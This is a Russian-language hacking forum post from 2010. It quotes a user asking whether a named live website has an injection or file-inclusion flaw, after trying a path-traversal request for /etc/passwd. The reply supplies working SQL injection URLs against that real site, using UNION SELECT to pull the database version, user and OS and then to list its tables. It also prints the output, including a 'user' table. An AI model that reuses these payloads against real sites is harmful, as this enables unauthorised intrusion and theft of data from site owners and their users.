04.04.2010, 14:39
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от Ershik
Я вижу запрос в адресную строку типа:
http://mihadmin.ru/statpage.php?sid=love
Подставляю вместо нее другой запрос:
http://mihadmin.ru/statpage.php?sid=/.../../../.../etc/passwd
На что система мне выдает:
http://mihadmin.ru/statpage.php?sid=-1' - реагирует с ошибкой.
Но если пытаюсь работать боле глубже
http://mihadmin.ru/statpage.php?sid=-1'+order+by+1/* - столбцы не выводяться
Вообщем, если ли тут иньекция?
Инклуд или скуль?
http://mihadmin.ru/statpage.php?sid=love'+union+select+1,2,concat_ws( 0x3a,version(),database(),user(),@@version_compile _os),4+--+
5.0.51a-24+lenny2:mihadmin_main:mihadmin_main@localhost:de bian-linux-gnu
http://mihadmin.ru/statpage.php?sid=love'+union+select+1,2,group_conc at(0x0b,table_name),4+from+information_schema.tabl es+--+
CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
article,
const,
group,
group_refer,
menu,
news,
rights,
rights_refer,
statpage,
user
|
|
|